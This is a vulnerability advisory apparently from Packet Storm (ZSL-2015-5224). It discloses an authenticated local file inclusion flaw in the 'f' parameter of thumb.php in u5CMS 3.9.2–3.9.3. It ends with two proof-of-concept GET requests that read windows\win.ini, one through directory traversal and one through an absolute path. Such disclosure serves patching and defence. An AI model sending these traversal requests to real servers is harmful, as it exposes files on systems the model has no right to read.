u5CMS 3.9.3 Local File Inclusion

Type packetstorm
Reporter LiquidWorm
Modified 2015-02-09T00:00:00


u5CMS 3.9.3 (thumb.php) Local File Inclusion Vulnerability  
Vendor: Stefan P. Minder  
Product web page: http://www.yuba.ch  
Affected version: 3.9.3 and 3.9.2  
Summary: u5CMS is a little, handy Content Management System for medium-sized  
websites, conference / congress / submission administration, review processes,  
personalized serial mails, PayPal payments and online surveys based on PHP and  
MySQL and Apache.  
Desc: u5CMS suffers from an authenticated file inclusion vulnerability (LFI) when  
input passed thru the 'f' parameter to thumb.php script is not properly verified  
before being used to include files. This can be exploited to include files from  
local resources with their absolute path and with directory traversal attacks.  
Tested on: Apache 2.4.10 (Win32)  
PHP 5.6.3  
MySQL 5.6.21  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2015-5224  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5224.php  
GET /u5cms/thumb.php?w=100&f=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1  
GET /u5cms/thumb.php?w=100&f=/windows/win.ini HTTP/1.1